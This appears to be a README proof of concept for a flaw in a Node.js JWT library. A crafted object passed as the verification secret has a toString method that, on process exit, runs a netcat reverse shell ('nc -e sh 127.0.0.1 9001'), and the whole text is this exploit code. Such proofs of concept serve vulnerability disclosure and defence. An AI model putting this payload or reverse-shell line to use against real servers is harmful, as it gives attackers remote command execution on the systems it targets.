README.md
Rendering markdown...
// npm install [email protected]
var jwt = require('jsonwebtoken');
// create a token using the servers secret
var token = jwt.sign({"x":"y"}, 'servers_secret');
// create malicious object containing a reverse shell (node.js)
var poisoned_secret_on_server = {
toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
process.on('exit', ()=> {
require('child_process').exec('nc -e sh 127.0.0.1 9001');
});
process.exit(0)
}
}
// Server verifies the token using malicious object stored as secret
jwt.verify(token, poisoned_secret_on_server);